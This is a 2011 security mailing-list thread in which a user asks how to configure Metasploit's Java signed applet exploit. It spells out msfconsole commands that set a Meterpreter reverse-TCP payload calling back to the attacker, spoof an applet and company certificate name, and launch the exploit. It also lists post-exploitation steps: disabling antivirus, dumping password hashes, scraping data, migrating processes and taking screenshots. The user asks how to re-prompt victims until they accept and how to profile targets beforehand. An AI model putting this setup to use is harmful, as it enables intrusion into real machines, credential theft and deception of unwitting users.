Re: HELP: metasploit v3.8.0-dev (Java UNsigned Applet) and meterpreter AutoRun scripts.
From: Carlos Perez <carlos_perez () darkoperator com>
Date: Sun, 19 Jun 2011 13:28:58 -0400
Your rc file should not be used with multiscript but with the multi console command script.
Sent from my iPhone
On Jun 19, 2011, at 12:39 PM, jambunathan sadasivamiyer <jamshuttle77 () gmail com> wrote:
You may get some tips from some of the team members.
On Sun, Jun 19, 2011 at 9:56 PM, Richard Miles <richard.k.miles () googlemail com> wrote:
No one can help me?
On Thu, Jun 16, 2011 at 4:18 PM, Richard Miles
<richard.k.miles () googlemail com> wrote:
1) I want to test the Java Signed Applet, I'm using version metasploit
v3.8.0-dev, I'm following this tutorial:
It works, however I still get it with bad digital signature. Below is
how I'm executing it:
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set AutoRunScript multiscript -s /root/script.rc
set LHOST MyIP
set APPLETNAME CompanyName
set CERTCN Santo CompanyName
set SRVPORT 80
set ExitOnSession false
exploit -j -z
And it works, but I always see it in the browser as unsigned (bad
digital signature). What am I doing wrong?
b) Also, on my script.rc I have:
But on the output of msfconsole I just see:
meterpreter > run multi_console_command -s /root/dump.rc
[*] Running Command List ...
And I never see the output.
I basically just want to do the following once a connection with
meterpreter is established.
- get a screenshot
- get sysinfo and getuid
- run killav and scraper
- launch getpriv
- execute hashdump
- execute "dir c:\" and "ps".
- call migrate -f (create a notepad and migrate to it)
- sleep 45 seconds and get another screenshot.
Can someone help me how to do it? I want to see all output on the
msfconsole or save locally on the msfconsole machine. How?
C) Is there a way to tell metasploit to reload the Java Signed Applet
exploit until the user clicks "yes"?
D) I would love to have a .php script doing basic enumeration of my
target before executing Java Signed Applet. Is there a way to launch
this exploit in Apache, or any other way that I can first execute a
.php script and then redirect to the Java Signed Applet exploit?
Thanks a lot.